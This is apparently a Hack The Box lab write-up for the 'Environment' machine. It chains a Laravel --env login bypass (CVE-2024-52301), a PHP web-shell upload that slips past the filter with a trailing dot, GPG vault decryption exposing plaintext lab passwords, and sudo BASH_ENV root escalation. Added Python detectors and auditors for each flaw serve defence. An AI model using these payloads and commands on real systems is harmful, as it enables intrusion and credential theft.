Here are my notes on the ENVIRONMENT box from Hack The Box.
ENVIRONMENT: 10.129.87.60
nmapAutomator.sh --host 10.129.87.60 --type All
sudo autorecon 10.129.87.60 --vhost-enum.hostname environment.htb --vhost-enum.wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --vhost-enum.threads 5 --global.domain environment.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c023395ef44e280cd3a960223f19264 (ECDSA)
|_ 256 1f3dc2195528a17759514810c44b74ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://environment.htb
dirsearch -u http://environment.htb/
[18:42:01] Starting:
[18:42:05] 403 - 555B - /%2e%2e;/test
[18:42:55] 403 - 555B - /admin/.config
[18:43:26] 403 - 555B - /admpar/.ftppass
[18:43:26] 403 - 555B - /admrev/.ftppass
[18:43:41] 403 - 555B - /bitrix/.settings.php.bak
[18:43:41] 403 - 555B - /bitrix/.settings
[18:43:41] 403 - 555B - /bitrix/.settings.bak
[18:43:45] 403 - 555B - /build/
[18:43:46] 301 - 169B - /build -> http://environment.htb/build/
[18:44:39] 403 - 555B - /ext/.deps
[18:44:41] 200 - 0B - /favicon.ico
[18:45:10] 200 - 2KB - /index.php/login/
[18:45:23] 403 - 555B - /lib/flex/uploader/.project
[18:45:23] 403 - 555B - /lib/flex/uploader/.actionScriptProperties
[18:45:23] 403 - 555B - /lib/flex/uploader/.flexProperties
[18:45:23] 403 - 555B - /lib/flex/uploader/.settings
[18:45:23] 403 - 555B - /lib/flex/varien/.actionScriptProperties
[18:45:23] 403 - 555B - /lib/flex/varien/.flexLibProperties
[18:45:23] 403 - 555B - /lib/flex/varien/.settings
[18:45:23] 403 - 555B - /lib/flex/varien/.project
[18:45:28] 200 - 2KB - /login
[18:45:29] 200 - 2KB - /login/
[18:45:31] 302 - 358B - /logout -> http://environment.htb/login
[18:45:32] 302 - 358B - /logout/ -> http://environment.htb/login
[18:45:34] 403 - 555B - /mailer/.env
[18:46:44] 403 - 555B - /resources/sass/.sass-cache/
[18:46:44] 403 - 555B - /resources/.arch-internal-preview.css
[18:46:46] 200 - 24B - /robots.txt
[18:47:12] 301 - 169B - /storage -> http://environment.htb/storage/
[18:47:12] 403 - 555B - /storage/
[18:47:30] 403 - 555B - /twitter/.env
[18:47:37] 405 - 245KB - /upload
[18:47:37] 405 - 245KB - /upload/
[18:47:42] 403 - 555B - /vendor/
Production v1.1
#No robots.txt
http://environment.htb/upload - 405 Method Not Allowed.
CVE-2024-52301 Laravel Notes:
PHP 8.2.28 — Laravel 11.30.0
[Target]: http://environment.htb
[~] Application Fingerprint
[HTTP STATUS]: 200
[Server]: nginx/1.22.1
[Common Laravel Cookie]: XSRF-TOKEN: eyJpdiI6ImVXTkh2U2hX...
[Common Laravel Cookie]: laravel_session: eyJpdiI6IlVtemsyYXdn...
[INFO]: Application running in Debug Mode (got via HTTP Method not allowed)
It's vulnerable to CVE-2024-52301
https://github.com/Nyamort/CVE-2024-52301
http://environment.htb/?--env=qwop
-It works: the footer changed to "QWOP v1.1" next to "environment.htb © 2025".
_token=DjIz8KhesjWamInZfhrIFwoxnQJ90Da3V6jl4UVW&email=qwop%40qwop.com&password=qwop&remember=True (or False).
#Try changing remember=True to remember=Test to trigger the error on purpose.
The error page leaks the source code of /login.
If the website gives you an error, that's a good thing: it can leak source code or other information that can be used for further enumeration.
/login error page:
routes/web.php:
$keep_loggedin = False;
} elseif ($remember == 'True') {
$keep_loggedin = True;
}
if($keep_loggedin !== False) {
// TODO: Keep user logged in if he selects "Remember Me?"
}
if(App::environment() == "preprod") { //QOL: login directly as me in dev/local/preprod envs
$request->session()->regenerate();
$request->session()->put('user_id', 1);
return redirect('/management/dashboard');
}
$user = User::where('email', $email)->first();
http://environment.htb/login?--env=preprod #Login with BurpSuite Request instead !
#Modified the login parameter to /login?--env=preprod and forwarded the request.
IT WORKS! We bypass the login page and land on /management/dashboard.
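Both the "?--env=qwop" probe and the "/login?--env=preprod" bypass leave the same trace in the web server's access log: a query-string key shaped like a CLI option. The following is an added detection example (not part of the original notes or of Laravel) that parses nginx combined-format lines and flags such keys; the log regex and the sample lines are constructed assumptions, adjust the pattern to your own log_format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# nginx "combined" log format (assumption of this example; adapt to your log_format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)


def argv_like_params(target: str) -> list[str]:
    """Return query keys that look like CLI options (start with '-') after decoding.

    Laravel's argv-based environment detection (CVE-2024-52301) honours a
    '--env=<name>' query key when PHP's register_argc_argv is on, so any
    option-shaped key in a web request is worth alerting on.
    """
    query = urlsplit(target).query
    keys = []
    # keep_blank_values so a bare '?--env' with no value is still seen.
    for key, _value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decoding a second time is
        # deliberate so double-encoded '%252d%252denv' is caught as well.
        key = unquote(key).strip()
        if key.startswith("-"):
            keys.append(key)
    return keys


def scan_access_log(lines):
    """Return (ip, timestamp, target, suspicious_keys) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        keys = argv_like_params(m.group("target"))
        if keys:
            hits.append((m.group("ip"), m.group("ts"), m.group("target"), keys))
    return hits


# Constructed sample lines (not real traffic): lines 1 and 3 mirror the requests
# made in the notes, line 5 is a percent-encoded variant, the rest are benign.
SAMPLE_LOG = """\
10.10.14.174 - - [30/Aug/2025:06:01:12 +0000] "GET /?--env=qwop HTTP/1.1" 200 2415
10.10.14.174 - - [30/Aug/2025:06:01:40 +0000] "GET /login HTTP/1.1" 200 2048
10.10.14.174 - - [30/Aug/2025:06:02:03 +0000] "POST /login?--env=preprod HTTP/1.1" 302 358
10.10.14.175 - - [30/Aug/2025:06:02:10 +0000] "GET /?page=2&sort=-date HTTP/1.1" 200 1000
10.10.14.176 - - [30/Aug/2025:06:02:15 +0000] "GET /?%2d%2denv=local HTTP/1.1" 200 2415
"""

if __name__ == "__main__":
    for ip, ts, target, keys in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {target} -> option-like keys {keys}")
```

Note that "sort=-date" is not flagged: only keys are inspected, because only the key position is what the argv parser interprets as an option name. Pair the alert with the real fix (upgrade Laravel past the affected release, or set register_argc_argv=Off for the web SAPI).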
/management/profile:
ENVIRONMENT-HTB File Upload Bypass Example:
File Upload Bypass as usual?
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
As usual: run the extension list through Intruder against a regular PNG file.
php3 works!
CONTENT-TYPE: image/png
/storage/files/shell.png.php3
shell.png.php3:
GIF8
<?php
if (!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd']);
[SNIP]
http://environment.htb/storage/files/shell.png.php3
Works, but the server only serves the file for download instead of executing it.
┌──(root㉿kali)-[/home/kali/BOXES/ENVIRONMENT]
└─# cat shell.gif.php
GIF89a
<?php system($_GET["cmd"]); ?>
If we try to upload it, the file does indeed bypass the "image only" check, but browsing to the file's URL doesn't seem to execute the revshell.
After more attempts and paying more attention to how the upload function manipulates the file and generates the URL, we find that the extension that works is ".php." (with a trailing dot).
Adding the final dot to the file extension completely bypasses the upload filter and lets us execute the reverse shell.
shell.gif.php.
┌──(root㉿kali)-[/home/kali/CBBH-EXAM]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.174] from (UNKNOWN) [10.129.87.60] 56306
bash: cannot set terminal process group (929): Inappropriate ioctl for device
bash: no job control in this shell
www-data@environment:~/app/storage/app/public/files$ whoami
whoami
www-data
www-data@environment:~/app/storage/app/public/files$ hostname
hostname
environment
USER-SHELL !
www-data@environment:/home/hish$ whoami
whoami
www-data
www-data@environment:/home/hish$ hostname
hostname
environment
www-data@environment:/home/hish$ ls
ls
backup
user.txt
www-data@environment:/home/hish$ cat user.txt
cat user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
www-data -> hish:
www-data@environment:/home/hish/backup$ pwd
/home/hish/backup
www-data@environment:/home/hish/backup$ ls
ls
keyvault.gpg
www-data@environment:/home/hish/backup$ file keyvault.gpg
file keyvault.gpg
keyvault.gpg: PGP RSA encrypted session key - keyid: B755B0ED D6CFCFD3 RSA (Encrypt or Sign) 2048b .
www-data@environment:/home/hish$ ls -lah
ls -lah
total 36K
drwxr-xr-x 5 hish hish 4.0K Apr 11 00:51 .
drwxr-xr-x 3 root root 4.0K Jan 12 2025 ..
lrwxrwxrwx 1 root root 9 Apr 7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish 220 Jan 6 2025 .bash_logout
-rw-r--r-- 1 hish hish 3.5K Jan 12 2025 .bashrc
drwxr-xr-x 4 hish hish 4.0K Aug 30 06:12 .gnupg
drwxr-xr-x 3 hish hish 4.0K Jan 6 2025 .local
-rw-r--r-- 1 hish hish 807 Jan 6 2025 .profile
drwxr-xr-x 2 hish hish 4.0K Jan 12 2025 backup
-rw-r--r-- 1 root hish 33 Aug 30 00:22 user.txt
www-data@environment:/home/hish$ cp -r .gnupg /tmp
cp -r .gnupg /tmp
gpg --homedir /tmp/.gnupg --list-secret-keys
gpg --homedir /tmp/.gnupg --output juicy_decrypted.txt --decrypt keyvault.gpg
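The reason www-data can do this is visible in the ls -lah output above: hish's .gnupg directory is 755, so any local user can copy the keyring, and the secret key has no passphrase. The following is an added audit example (not part of the notes) that walks a home root and reports .gnupg/.ssh directories, and the files inside them, that are readable or traversable by group/other; it builds its own throwaway home layout so it runs offline. The directory names and modes in the demo are constructed.

```python
import os
import stat
import tempfile
from pathlib import Path

SENSITIVE_DIRS = (".gnupg", ".ssh")
GROUP_OTHER = stat.S_IRWXG | stat.S_IRWXO


def exposed_key_material(home_root) -> list[tuple[str, str]]:
    """Return (path, octal mode) for every .gnupg/.ssh directory under home_root
    that group/other can read or enter, plus any file beneath it with group/other
    bits set. gpg itself prints 'unsafe permissions on homedir' for the former."""
    findings = []
    for home in sorted(p for p in Path(home_root).iterdir() if p.is_dir()):
        for name in SENSITIVE_DIRS:
            d = home / name
            if not d.is_dir():
                continue
            mode = stat.S_IMODE(d.lstat().st_mode)
            if mode & GROUP_OTHER:
                findings.append((str(d), oct(mode)))
            for dirpath, _dirs, files in os.walk(d):
                for f in files:
                    fp = Path(dirpath) / f
                    fmode = stat.S_IMODE(fp.lstat().st_mode)
                    if fmode & GROUP_OTHER:
                        findings.append((str(fp), oct(fmode)))
    return findings


def build_demo_home(base: str) -> str:
    """Constructed layout: 'hish' with a 755 .gnupg (as on the box) containing a
    644 keyring file, and 'bob' with a correctly locked-down 700 .gnupg."""
    hish = Path(base) / "hish" / ".gnupg"
    hish.mkdir(parents=True)
    os.chmod(hish, 0o755)
    (hish / "pubring.kbx").write_bytes(b"constructed, not a real keyring")
    os.chmod(hish / "pubring.kbx", 0o644)

    bob = Path(base) / "bob" / ".gnupg"
    bob.mkdir(parents=True)
    (bob / "pubring.kbx").write_bytes(b"constructed, not a real keyring")
    os.chmod(bob / "pubring.kbx", 0o600)
    os.chmod(bob, 0o700)
    return base


def run_demo() -> list[tuple[str, str]]:
    """Create the demo layout in a temp dir and audit it; returns the findings
    with the temp prefix stripped so results are stable."""
    base = tempfile.mkdtemp(prefix="homes-")
    build_demo_home(base)
    return [(p.replace(base, "", 1), m) for p, m in exposed_key_material(base)]


if __name__ == "__main__":
    for path, mode in run_demo():
        print(f"{mode} {path}")
```

On a real host point exposed_key_material at /home (and /root) and fix hits with chmod 700 on the directory and 600 on its files; a passphrase on the secret key would have been the second layer that was missing here.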
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --list-secret-keys
gpg --homedir /tmp/.gnupg --list-secret-keys
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
/tmp/.gnupg/pubring.kbx
-----------------------
sec rsa2048 2025-01-11 [SC]
F45830DFB638E66CD8B752A012F42AE5117FFD8E
uid [ultimate] hish_ <hish@environment.htb>
ssb rsa2048 2025-01-11 [E]
www-data@environment:/tmp$ gpg --homedir /tmp/.gnupg --output juicy_decrypted.txt --decrypt keyvault.gpg
<--output juicy_decrypted.txt --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir '/tmp/.gnupg'
gpg: encrypted with 2048-bit RSA key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
www-data@environment:/tmp$
www-data@environment:/tmp$ ls
ls
juicy_decrypted.txt
keyvault.gpg
systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-logind.service-bjkXGi
systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-timesyncd.service-60cPok
vmware-root_544-2991268551
www-data@environment:/tmp$ cat juicy_decrypted.txt
cat juicy_decrypted.txt
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
www-data@environment:/tmp$ ls -lah
ls -lah
total 48K
drwxrwxrwt 10 root root 4.0K Aug 30 06:13 .
drwxr-xr-x 18 root root 4.0K Apr 30 00:31 ..
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .ICE-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .X11-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .XIM-unix
drwxrwxrwt 2 root root 4.0K Aug 30 00:20 .font-unix
drwxr-xr-x 4 www-data www-data 4.0K Aug 30 06:13 .gnupg
-rw-r--r-- 1 www-data www-data 107 Aug 30 06:13 juicy_decrypted.txt
-rw-r--r-- 1 www-data www-data 430 Aug 30 06:09 keyvault.gpg
drwx------ 3 root root 4.0K Aug 30 00:20 systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-logind.service-bjkXGi
drwx------ 3 root root 4.0K Aug 30 00:20 systemd-private-1a51fb1ba6474c2abf428e86482e729a-systemd-timesyncd.service-60cPok
drwx------ 2 root root 4.0K Aug 30 00:22 vmware-root_544-2991268551
hish:marineSPm@ster!!
www-data@environment:/tmp$ su - hish
su - hish
Password: marineSPm@ster!!
id
uid=1000(hish) gid=1000(hish) groups=1000(hish),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)
whoami
hish
hostname
environment
HISH USER-SHELL !
hish -> root:
ENV_KEEP+="ENV BASH_ENV" PRIV ESC Notes:
python3 -c 'import pty; pty.spawn("/bin/bash")'
hish@environment:~$ sudo -l
sudo -l
[sudo] password for hish: Ihaves0meMon$yhere123
Sorry, try again.
[sudo] password for hish: marineSPm@ster!!
Matching Defaults entries for hish on environment:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo
env_keep+="ENV BASH_ENV" looks interesting: sudo keeps BASH_ENV from the caller's environment, and bash sources whatever file that variable points to whenever it starts non-interactively, so any bash script run through sudo sources it first.
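A defender finds this misconfiguration the same way the notes do, by reading the Defaults. The following is an added audit example (not part of the notes or of sudo) that parses sudo -l output or raw sudoers Defaults lines, lists every variable re-added through env_keep, and flags the ones that let the caller inject code into whatever sudo runs. The sample text is a constructed copy of the output above; the variable list is this example's own, not exhaustive.

```python
import re

# Variables that turn a preserved environment into code execution in the
# privileged process. sudo's env_reset strips them by default; env_keep adds
# them back, which is what happened on this box.
DANGEROUS_ENV = {
    "BASH_ENV": "bash sources this file when started non-interactively",
    "ENV": "sh/ksh source this file at start-up",
    "LD_PRELOAD": "dynamic loader injects the listed library",
    "LD_LIBRARY_PATH": "dynamic loader resolves libraries from here first",
    "PERL5OPT": "extra options applied to every perl invocation",
    "PYTHONPATH": "python imports modules from here before the stdlib",
}

# env_keep = "A B", env_keep += "A B", or env_keep+=A. A '-=' (removal) does not match.
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*(?:"([^"]*)"|(\S+))')
# Command lines from 'sudo -l', e.g. '(ALL) /usr/bin/systeminfo' or '(root) NOPASSWD: /bin/ls'.
RULE_RE = re.compile(r'^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$', re.M)


def kept_env_vars(text: str) -> list[str]:
    """All variable names re-added through env_keep, in order of appearance."""
    found = []
    for m in ENV_KEEP_RE.finditer(text):
        value = m.group(1) if m.group(1) is not None else m.group(2)
        found.extend(v.strip(",") for v in value.split())
    return found


def audit_env_keep(text: str) -> list[tuple[str, str]]:
    """(variable, why it matters) for every kept variable that is dangerous."""
    return [(v, DANGEROUS_ENV[v]) for v in kept_env_vars(text) if v in DANGEROUS_ENV]


def sudo_rules(text: str) -> list[tuple[str, str]]:
    """(runas, command) pairs from the 'may run the following commands' section."""
    _head, sep, tail = text.partition("may run the following commands")
    return [(m.group(1), m.group(3)) for m in RULE_RE.finditer(tail)] if sep else []


def report(text: str) -> list[str]:
    """Human-readable findings: one line per dangerous variable, per allowed command."""
    lines = []
    dangerous = audit_env_keep(text)
    rules = sudo_rules(text)
    for var, why in dangerous:
        for runas, cmd in rules or [("?", "<any sudo command>")]:
            lines.append(f"{var} kept ({why}) while ({runas}) may run {cmd}")
    return lines


# Constructed copy of the 'sudo -l' output seen on the box.
SAMPLE_SUDO_L = """\
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
"""

if __name__ == "__main__":
    for line in report(SAMPLE_SUDO_L):
        print(line)
```

The fix is to drop the env_keep line (or at least ENV and BASH_ENV from it) and, if the script genuinely needs variables, pass them explicitly through a wrapper rather than from the caller's environment.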
hish@environment:/tmp$ echo '/bin/bash' > /tmp/root.sh
echo '/bin/bash' > /tmp/root.sh
hish@environment:/tmp$ chmod +x /tmp/root.sh
chmod +x /tmp/root.sh
hish@environment:/tmp$ export BASH_ENV=/tmp/root.sh
export BASH_ENV=/tmp/root.sh
sudo /usr/bin/systeminfo
root@environment:/tmp# whoami
whoami
root
root@environment:/tmp# hostname
hostname
environment
root@environment:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
ROOT-SHELL !
root@environment:~# whoami
whoami
root
root@environment:~# hostname
hostname
environment
root@environment:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@environment:~# ls
ls
root.txt scripts
root@environment:~# cat root.txt
cat root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
